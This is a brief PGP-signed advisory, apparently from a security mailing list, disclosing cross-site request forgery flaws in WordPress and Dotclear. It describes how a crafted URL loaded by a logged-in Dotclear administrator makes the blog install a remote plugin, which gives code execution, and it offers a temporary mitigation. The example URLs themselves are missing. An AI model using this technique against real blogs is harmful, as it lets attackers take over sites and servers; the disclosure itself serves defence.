-----BEGIN PGP SIGNED MESSAGE-----
There is a French website about two vulnerabilities ; the one works on
Wordpress (27/05/2007) and the other on Dotclear (08/07/2007) :
If a Dotclear blog administrator is logged in (or has a cookie for
automatic identification), you can redirect him (by an image posted in
his forum for example) to an URL such as :
In this case, Dotclear will get, install and activate the plugin
It's very easy now to execute arbitrary instructions on the remote server.
A temporary solution is to rename admin's folder ("ecrire" for Dotclear
1 or "admin" for Dotclear 2). There is no official patch at this time.
There is some other examples that allow you to add an administrator,
change the website's theme, based on the same concept.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
-----END PGP SIGNATURE-----